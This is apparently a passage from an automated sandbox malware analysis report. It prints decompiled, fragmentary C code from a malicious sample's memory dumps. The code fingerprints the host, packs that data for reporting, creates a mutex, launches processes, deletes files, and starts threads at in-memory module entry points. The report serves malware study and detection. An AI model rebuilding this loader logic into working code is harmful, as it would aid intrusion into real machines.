    						asm("stosd");
    						asm("int3");
    						E001F1790(_t26, _t27);
    						_t32 = _t32 + 8;
    					}
    					 *0x1fc1f8(0x1fc2a8, 0x104, _t30, _t31 - 0x28,  *0x1fc3ac);
    					_t13 = HeapFree(GetProcessHeap(), 0, _t30);
    				}
    				goto 0x331a1e;
    				return _t13;
    			}

    APIs
    • MapViewOfFile.KERNEL32 ref: 001F9569
    • GetFileSize.KERNEL32(?,00000000), ref: 001F9578
    • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 001F9582
    • UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 001F958E
    • CloseHandle.KERNEL32 ref: 001F9595
    • CloseHandle.KERNEL32 ref: 001F959C
    • GetComputerNameW.KERNEL32(?,?), ref: 001F95B1
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 001F9601
    • RtlAllocateHeap.NTDLL(00000000), ref: 001F9608
    • _snprintf.NTDLL ref: 001F9642
    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 001F964E
    • HeapFree.KERNEL32(00000000), ref: 001F9655
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 100%
    			E001FA037(unsigned int __eax, void* __ebx, void* __ecx, void* __edx, signed char* __edi) {
    				unsigned int _t31;
    				unsigned int _t32;
    				long _t41;
    				signed char _t52;
    				signed char _t54;
    				signed char _t56;
    				signed char _t58;
    				signed char _t60;
    				void* _t62;
    				intOrPtr* _t63;
    				int _t65;
    				int _t66;
    				int _t67;
    				void* _t68;
    				signed char _t69;
    				signed char _t71;
    				signed char _t73;
    				signed char _t75;
    				signed char _t77;
    				void* _t79;
    				void* _t80;
    				void* _t81;
    				void* _t82;
    				int _t83;
    				signed char* _t84;
    				void* _t86;
    				char* _t89;
    				signed char* _t91;
    				signed char* _t92;
    				void* _t93;
    				char* _t94;
    				signed char* _t95;
    				void* _t96;
    				char* _t97;
    				signed char* _t98;
    				void* _t99;
    				char* _t100;
    				signed char* _t101;
    				void* _t103;
    
    				_t84 = __edi;
    				_t79 = __edx;
    				_t68 = __ecx;
    				_t62 = __ebx;
    				_t31 = __eax;
    				if(__eax > 0x7f) {
    					do {
    						_t31 = _t31 >> 7;
    						_t62 = _t62 + 1;
    					} while (_t31 > 0x7f);
    				}
    				_t32 = _t84[0x28];
    				 *((intOrPtr*)(_t103 - 4)) = 1;
    				while(_t32 > 0x7f) {
    					 *((intOrPtr*)(_t103 - 4)) =  *((intOrPtr*)(_t103 - 4)) + 1;
    					_t32 = _t32 >> 7;
    				}
    				_t63 =  *((intOrPtr*)(_t103 - 0xc));
    				_t41 = _t84[0x28] + _t84[0x20] + _t84[0x18] + _t84[8] +  *((intOrPtr*)(_t103 - 4)) + _t62 + _t79 + _t68 +  *((intOrPtr*)(_t103 - 8)) + 0xf;
    				 *(_t63 + 4) = _t41;
    				_t89 = RtlAllocateHeap(GetProcessHeap(), 0, _t41);
    				 *_t63 = _t89;
    				if(_t89 != 0) {
    					 *_t89 = 8;
    					_t91 = _t89 + 1;
    					_t69 =  *_t84;
    					while(_t69 > 0x7f) {
    						_t60 = _t69;
    						_t69 = _t69 >> 7;
    						 *_t91 = _t60 | 0x00000080;
    						_t91 =  &(_t91[1]);
    					}
    					 *_t91 = _t69 & 0x0000007f;
    					_t91[1] = 0x12;
    					_t92 =  &(_t91[2]);
    					_t65 = _t84[8];
    					_t71 = _t65;
    					_t80 = _t84[4];
    					if(_t65 > 0x7f) {
    						do {
    							_t58 = _t71;
    							_t71 = _t71 >> 7;
    							 *_t92 = _t58 | 0x00000080;
    							_t92 =  &(_t92[1]);
    						} while (_t71 > 0x7f);
    					}
    					 *_t92 = _t71 & 0x0000007f;
    					_t93 =  &(_t92[1]);
    					memcpy(_t93, _t80, _t65);
    					_t94 = _t93 + _t65;
    					 *_t94 = 0x1d;
    					 *(_t94 + 1) = _t84[0xc];
    					 *((char*)(_t94 + 5)) = 0x25;
    					 *(_t94 + 6) = _t84[0x10];
    					 *((char*)(_t94 + 0xa)) = 0x2a;
    					_t95 = _t94 + 0xb;
    					_t66 = _t84[0x18];
    					_t73 = _t66;
    					_t81 = _t84[0x14];
    					if(_t66 > 0x7f) {
    						do {
    							_t56 = _t73;
    							_t73 = _t73 >> 7;
    							 *_t95 = _t56 | 0x00000080;
    							_t95 =  &(_t95[1]);
    						} while (_t73 > 0x7f);
    					}
    					 *_t95 = _t73 & 0x0000007f;
    					_t96 =  &(_t95[1]);
    					memcpy(_t96, _t81, _t66);
    					_t97 = _t96 + _t66;
    					 *_t97 = 0x32;
    					_t98 = _t97 + 1;
    					_t67 = _t84[0x20];
    					_t75 = _t67;
    					_t82 = _t84[0x1c];
    					if(_t67 > 0x7f) {
    						do {
    							_t54 = _t75;
    							_t75 = _t75 >> 7;
    							 *_t98 = _t54 | 0x00000080;
    							_t98 =  &(_t98[1]);
    						} while (_t75 > 0x7f);
    					}
    					 *_t98 = _t75 & 0x0000007f;
    					_t99 =  &(_t98[1]);
    					memcpy(_t99, _t82, _t67);
    					_t100 = _t99 + _t67;
    					 *_t100 = 0x3a;
    					_t101 = _t100 + 1;
    					_t83 = _t84[0x28];
    					_t77 = _t83;
    					_t86 = _t84[0x24];
    					if(_t83 > 0x7f) {
    						do {
    							_t52 = _t77;
    							_t77 = _t77 >> 7;
    							 *_t101 = _t52 | 0x00000080;
    							_t101 =  &(_t101[1]);
    						} while (_t77 > 0x7f);
    					}
    					 *_t101 = _t77 & 0x0000007f;
    					memcpy( &(_t101[1]), _t86, _t83);
    					_t63 =  *((intOrPtr*)(_t103 - 0xc));
    				}
    				return 0 |  *_t63 != 0x00000000;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000,00000001), ref: 001FA091
    • RtlAllocateHeap.NTDLL(00000000), ref: 001FA098
    • memcpy.NTDLL(00000000,00000001,?), ref: 001FA0F8
    • memcpy.NTDLL(-0000000A,?,?), ref: 001FA148
    • memcpy.NTDLL(-00000008,?,?), ref: 001FA17C
    • memcpy.NTDLL(-00000006,?,?), ref: 001FA1B0
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    APIs
    • memset.NTDLL ref: 001F90C6
    • _snwprintf.NTDLL ref: 001F90F5
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F9100
    • HeapFree.KERNEL32(00000000), ref: 001F9107
    • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 001F9116
    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001F9128
      • Part of subcall function 001FA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001FA7B8
      • Part of subcall function 001FA7A0: CloseHandle.KERNEL32(?), ref: 001FA7CC
      • Part of subcall function 001FA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001F8F95), ref: 001FA7D5
      • Part of subcall function 001FA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001FA7DC
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 25%
    			E001F9990() {
    				int _t10;
    				void* _t12;
    
    				memset();
    				 *(_t12 - 0x88) = 0x44;
    				 *((intOrPtr*)(_t12 - 0x5c)) = 0x80;
    				_t10 = CreateProcessW(0x1fc7c0, 0, 0, 0, 0, 0, 0, 0, _t12 - 0x88, _t12 - 0x30);
    				if(_t10 != 0) {
    					CloseHandle( *(_t12 - 0x30));
    					_t10 = CloseHandle( *(_t12 - 0x2c));
    				}
    				goto 0x331bae;
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				asm("int3");
    				return _t10;
    			}

    APIs
    • memset.NTDLL ref: 001F9990
    • CreateProcessW.KERNEL32(001FC7C0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001F99C8
    • CloseHandle.KERNEL32(?), ref: 001F99D5
    • CloseHandle.KERNEL32(?), ref: 001F99DE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    APIs
    • GetProcessHeap.KERNEL32(?,?), ref: 001F2452
    • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001F2459
    • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 001F2497
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 001F253A
    • HeapFree.KERNEL32(00000000), ref: 001F2541
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 21%
    			E001F86C5(intOrPtr* __edi) {
    				void* _t24;
    				void* _t26;
    
    				HeapFree(GetProcessHeap(), ??, ??);
    				 *0x1fc260( *((intOrPtr*)(_t26 - 0x30)));
    				 *0x1fc260( *((intOrPtr*)(_t26 - 0x34)));
    				 *0x1fc260( *((intOrPtr*)(_t26 - 0x38)));
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t24);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *__edi != 0x00000000;
    			}

    APIs
    • GetProcessHeap.KERNEL32 ref: 001F86C5
    • HeapFree.KERNEL32(00000000), ref: 001F86CC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F86F1
    • HeapFree.KERNEL32(00000000), ref: 001F86F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F8701
    • HeapFree.KERNEL32(00000000), ref: 001F8708
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 35%
    			E001F8A5E(void* __ecx, void* __edx, void* __edi, signed char __esi, void* __eflags) {
    				void* _t19;
    				intOrPtr _t20;
    				signed char _t25;
    				void* _t27;
    				intOrPtr _t31;
    				void* _t32;
    				void _t34;
    				signed char _t35;
    				signed char _t38;
    				signed int _t43;
    				intOrPtr _t46;
    				signed char _t47;
    				void* _t48;
    
    				L0:
    				while(1) {
    					L0:
    					_t47 = __esi;
    					_t45 = __edi;
    					_t20 = L001F1F70(_t19, __ecx, __edx);
    					 *((intOrPtr*)(__edi + 8)) = _t20;
    					if(_t20 == 0) {
    						goto L17;
    					}
    					L11:
    					_t31 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
    					 *((intOrPtr*)(__edi + 0xc)) = _t31;
    					if(_t31 == 0) {
    						L15:
    						goto 0x3317a5;
    						asm("int3");
    						asm("int3");
    						_push( *((intOrPtr*)(_t45 + 8)));
    						L16:
    						asm("adc eax, 0x1fc178");
    						goto L17;
    					} else {
    						L12:
    						goto 0x331789;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("stosd");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						L13:
    						_t32 = CreateThread();
    						 *(__edi + 0x10) = _t32;
    						if(_t32 == 0) {
    							goto L15;
    						} else {
    							L14:
    							 *((intOrPtr*)(__edi + 4)) =  *((intOrPtr*)(_t48 - 0x18));
    							_t34 =  *0x1fc274; // 0x0
    							 *__edi = _t34;
    							 *0x1fc274 = __edi;
    							do {
    								L1:
    								_t46 =  *((intOrPtr*)(_t48 - 4));
    								L2:
    								_t43 = 0;
    								_t38 = 0;
    								 *(_t48 - 8) = 0;
    								_t35 = 0x80;
    								if(_t47 < _t46) {
    									while(1) {
    										L3:
    										_t35 =  *_t47;
    										_t47 = _t47 + 1;
    										_t43 = _t43 | (_t35 & 0x7f) << _t38;
    										if(_t35 >= 0) {
    											break;
    										}
    										L4:
    										_t38 = _t38 + 7;
    										if(_t47 < _t46) {
    											continue;
    										}
    										break;
    									}
    									L5:
    									 *(_t48 - 8) = _t43;
    								}
    								L6:
    								_t25 =  !((_t35 & 0x000000ff) >> 7);
    								if((_t25 & 0x00000001) != 0) {
    									L7:
    									_t25 = _t43 + _t47;
    									if(_t25 <= _t46) {
    										L8:
    										 *(_t48 - 0xc) = _t47;
    										_t47 = _t25;
    										_t25 = L001F8800(_t48 - 0xc, _t48 - 0x18);
    										if(_t25 != 0) {
    											goto L9;
    										}
    									}
    								}
    								L18:
    								goto 0x3317ba;
    								asm("int3");
    								return _t25;
    								L9:
    								_t27 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
    								_t45 = _t27;
    							} while (_t27 == 0);
    							goto 0x331775;
    							asm("int3");
    							continue;
    						}
    					}
    					L19:
    					L17:
    					HeapFree(GetProcessHeap(), 0, _t45);
    					goto L1;
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 001F8A45
    • RtlAllocateHeap.NTDLL(00000000), ref: 001F8A4C
    • GetProcessHeap.KERNEL32(00000000), ref: 001F8ABE
    • HeapFree.KERNEL32(00000000), ref: 001F8AC5
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    APIs
    • GetProcessHeap.KERNEL32 ref: 001F1EB9
    • RtlAllocateHeap.NTDLL(00000000), ref: 001F1EC0
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F1F2B
    • HeapFree.KERNEL32(00000000), ref: 001F1F32
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 43%
    			E001F8AB4(void* __ebx, void* __edi, signed char __esi) {
    				signed char _t21;
    				intOrPtr _t27;
    				intOrPtr _t30;
    				void* _t31;
    				void _t33;
    				signed char _t36;
    				signed char _t37;
    				signed int _t41;
    				intOrPtr _t44;
    				void* _t45;
    				signed char _t46;
    				void* _t47;
    
    				L0:
    				while(1) {
    					L0:
    					_t46 = __esi;
    					asm("adc eax, 0x1fc178");
    					while(1) {
    						L17:
    						HeapFree(GetProcessHeap(), 0, _t45);
    						while(1) {
    							L1:
    							_t44 =  *((intOrPtr*)(_t47 - 4));
    							L2:
    							_t41 = 0;
    							_t37 = 0;
    							 *(_t47 - 8) = 0;
    							_t36 = 0x80;
    							if(_t46 < _t44) {
    								while(1) {
    									L3:
    									_t36 =  *_t46;
    									_t46 = _t46 + 1;
    									_t41 = _t41 | (_t36 & 0x7f) << _t37;
    									if(_t36 >= 0) {
    										break;
    									}
    									L4:
    									_t37 = _t37 + 7;
    									if(_t46 < _t44) {
    										continue;
    									}
    									break;
    								}
    								L5:
    								 *(_t47 - 8) = _t41;
    							}
    							L6:
    							_t21 =  !((_t36 & 0x000000ff) >> 7);
    							if((_t21 & 0x00000001) != 0) {
    								L7:
    								_t21 = _t41 + _t46;
    								if(_t21 <= _t44) {
    									L8:
    									 *(_t47 - 0xc) = _t46;
    									_t42 = _t47 - 0x18;
    									_t38 = _t47 - 0xc;
    									_t46 = _t21;
    									_t21 = L001F8800(_t47 - 0xc, _t47 - 0x18);
    									if(_t21 != 0) {
    										L9:
    										_t45 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
    										if(_t45 == 0) {
    											L1:
    											_t44 =  *((intOrPtr*)(_t47 - 4));
    											goto L2;
    										} else {
    											L10:
    											goto 0x331775;
    											asm("int3");
    											L11:
    											_t27 = L001F1F70(_t23, _t38, _t42);
    											 *((intOrPtr*)(_t45 + 8)) = _t27;
    											if(_t27 == 0) {
    												L17:
    												HeapFree(GetProcessHeap(), 0, _t45);
    												continue;
    											} else {
    												L12:
    												_t30 = _t27 +  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x3c)) + _t27 + 0x28));
    												 *((intOrPtr*)(_t45 + 0xc)) = _t30;
    												if(_t30 == 0) {
    													L16:
    													goto 0x3317a5;
    													asm("int3");
    													asm("int3");
    													_push( *((intOrPtr*)(_t45 + 8)));
    													goto L0;
    												} else {
    													L13:
    													goto 0x331789;
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													asm("stosd");
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													asm("int3");
    													L14:
    													_t31 = CreateThread();
    													 *(_t45 + 0x10) = _t31;
    													if(_t31 == 0) {
    														goto L16;
    													} else {
    														L15:
    														 *((intOrPtr*)(_t45 + 4)) =  *((intOrPtr*)(_t47 - 0x18));
    														_t33 =  *0x1fc274; // 0x0
    														 *_t45 = _t33;
    														 *0x1fc274 = _t45;
    														do {
    															goto L1;
    														} while (_t45 == 0);
    														goto L10;
    													}
    												}
    											}
    										}
    										L19:
    									}
    								}
    							}
    							L18:
    							goto 0x3317ba;
    							asm("int3");
    							return _t21;
    						}
    					}
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 001F8A45
    • RtlAllocateHeap.NTDLL(00000000), ref: 001F8A4C
    • GetProcessHeap.KERNEL32(00000000), ref: 001F8ABE
    • HeapFree.KERNEL32(00000000), ref: 001F8AC5
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,001FC9C8,00000104), ref: 001F938C
    • GetProcessHeap.KERNEL32(00000008,0000015C), ref: 001F93C6
    • RtlAllocateHeap.NTDLL(00000000), ref: 001F93CD
    • lstrlen.KERNEL32(?), ref: 001F93F4
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 76%
    			E001F850C(intOrPtr __ecx, void* __edx, long* __edi) {
    				void* _t4;
    				void* _t9;
    				void* _t17;
    				void* _t19;
    
    				_t9 = __edx;
    				 *((intOrPtr*)(_t19 - 4)) = __ecx;
    				_t4 = RtlAllocateHeap(GetProcessHeap(), 0,  *__edi);
    				_t17 = _t4;
    				if(_t17 == 0) {
    					L4:
    					goto 0x3315de;
    					asm("int3");
    					return _t4;
    				} else {
    					_push(_t9);
    					_push( *((intOrPtr*)(_t19 - 4)));
    					if(L001F2DB0(_t17, __edi) == 0) {
    						_t4 = _t17;
    						goto L4;
    					} else {
    						HeapFree(GetProcessHeap(), 0, _t17);
    						return 0;
    					}
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000), ref: 001F8515
    • RtlAllocateHeap.NTDLL(00000000), ref: 001F851C
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F853F
    • HeapFree.KERNEL32(00000000), ref: 001F8546
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 100%
    			E001FA7A0(long __ecx) {
    				int _t3;
    				long _t7;
    				void* _t9;
    				void* _t10;
    
    				_t10 =  *0x1fcbd4; // 0x0
    				_t7 = __ecx;
    				_t9 = 0x1fcbd4;
    				while(_t10 != 0) {
    					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
    					if(_t3 == 0x102) {
    						_t9 = _t10;
    					} else {
    						 *_t9 =  *_t10;
    						CloseHandle( *(_t10 + 8));
    						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
    					}
    					_t10 =  *_t9;
    				}
    				return _t3;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 001FA7B8
    • CloseHandle.KERNEL32(?), ref: 001FA7CC
    • GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001F8F95), ref: 001FA7D5
    • HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001FA7DC
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 75%
    			E001F198D() {
    				void* _t11;
    				void* _t12;
    				void* _t13;
    				void* _t15;
    
    				L001F1830(_t11, _t12);
    				_t13 =  *(_t15 - 4);
    				 *0x1fc20c(_t15 - 0x20c, 0x104, _t13, 0x1fc7c0, _t13);
    				HeapFree(GetProcessHeap(), 0, _t13);
    				return DeleteFileW(_t15 - 0x20c);
    			}

    APIs
    • _snwprintf.NTDLL ref: 001F19A8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F19B4
    • HeapFree.KERNEL32(00000000), ref: 001F19BB
    • DeleteFileW.KERNEL32(?), ref: 001F19C8
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 73%
    			E001F891E(unsigned char* __eax, long __ebx, void* __edi, void* __esi) {
    				long _t10;
    				long _t12;
    				void* _t14;
    				void* _t17;
    
    				L0:
    				while(1) {
    					L0:
    					_t14 = __edi;
    					_t12 = __ebx;
    					 *__eax =  *__eax >> 1;
    					 *__eax =  *__eax;
    					VirtualFree( *(__esi + 8), 0, ??);
    					CloseHandle( *(__esi + 0x10));
    					 *__edi =  *__esi;
    					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
    					while(1) {
    						L4:
    						_t17 =  *_t14;
    						if(_t17 == 0) {
    							break;
    						}
    						L1:
    						_t10 = WaitForSingleObject( *(_t17 + 0x10), _t12);
    						if(_t10 == 0x102) {
    							L3:
    							_t14 = _t17;
    						} else {
    							L2:
    							goto 0x331734;
    							asm("int3");
    							asm("int3");
    							_push( *((intOrPtr*)(_t17 + 8)));
    							goto L0;
    						}
    					}
    					L5:
    					return _t10;
    					L6:
    				}
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 001F8908
    • VirtualFree.KERNEL32(?,00000000), ref: 001F892B
    • CloseHandle.KERNEL32(?), ref: 001F8934
    • GetProcessHeap.KERNEL32(00000000), ref: 001F8941
    • HeapFree.KERNEL32(00000000), ref: 001F8948
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 73%
    			E001F8B2C(unsigned char* __eax, void* __ebx, void* __edi, void* __esi) {
    				long _t10;
    				void* _t13;
    				void* _t16;
    
    				L0:
    				while(1) {
    					L0:
    					_t13 = __edi;
    					 *__eax =  *__eax >> 1;
    					 *__eax =  *__eax;
    					VirtualFree( *(__esi + 8), 0, ??);
    					CloseHandle( *(__esi + 0x10));
    					 *__edi =  *__esi;
    					_t10 = HeapFree(GetProcessHeap(), 0, __esi);
    					while(1) {
    						L4:
    						_t16 =  *_t13;
    						if(_t16 == 0) {
    							break;
    						}
    						L1:
    						_t10 = WaitForSingleObject( *(_t16 + 0x10), 0xffffffff);
    						if(_t10 == 0x102) {
    							L3:
    							_t13 = _t16;
    						} else {
    							L2:
    							goto 0x3317f6;
    							asm("int3");
    							asm("int3");
    							_push( *((intOrPtr*)(_t16 + 8)));
    							goto L0;
    						}
    					}
    					L5:
    					return _t10;
    					L6:
    				}
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001F8B16
    • VirtualFree.KERNEL32(?,00000000), ref: 001F8B39
    • CloseHandle.KERNEL32(?), ref: 001F8B42
    • GetProcessHeap.KERNEL32(00000000), ref: 001F8B4F
    • HeapFree.KERNEL32(00000000), ref: 001F8B56
    Memory Dump Source
    • Source File: 00000001.00000002.185212982.00000000001F1000.00000020.sdmp, Offset: 001F0000, based on PE: true
    • Associated: 00000001.00000002.185097485.00000000001F0000.00000002.sdmp
    • Associated: 00000001.00000002.185718938.00000000001FB000.00000002.sdmp
    • Associated: 00000001.00000002.185818082.00000000001FC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_1f0000_dnscart.jbxd
    C-Code - Quality: 35%
    			E001F866C(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
    				void* _t10;
    				void _t28;
    				intOrPtr _t31;
    				void* _t32;
    				void* _t35;
    				intOrPtr* _t40;
    				void* _t42;
    				void* _t44;
    
    				_t40 = __edi;
    				_t32 = __ebx;
    				if(L001F1E80(_t10, __ecx, __edx) != 0) {
    					goto 0x33168c;
    					asm("int3");
    					asm("int3");
    					if(L001F2560(__edx, _t40) != 0) {
    						_t35 =  *(_t44 - 0x10);
    						_t28 =  *_t35;
    						 *_t32 = _t28;
    						if(_t28 < 0x4000000) {
    							_push(_t32);
    							_t31 = L001F8500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
    							_t35 =  *(_t44 - 0x10);
    							 *_t40 = _t31;
    						}
    						HeapFree(GetProcessHeap(), 0, _t35);
    					}
    					HeapFree(GetProcessHeap(), ??, ??);
    				}
    				 *0x1fc260( *((intOrPtr*)(_t44 - 0x30)));
    				 *0x1fc260( *((intOrPtr*)(_t44 - 0x34)));
    				 *0x1fc260( *((intOrPtr*)(_t44 - 0x38)));
    				HeapFree(GetProcessHeap(), 0, 0);
    				HeapFree(GetProcessHeap(), 0, _t42);
    				HeapFree(GetProcessHeap(), ??, ??);
    				HeapFree(GetProcessHeap(), ??, ??);
    				return 0 |  *_t40 != 0x00000000;
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001F86F1
    • HeapFree.KERNEL32(00000000), ref: 001F86F8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001F8701
    • HeapFree.KERNEL32(00000000), ref: 001F8708
    Memory Dump Source
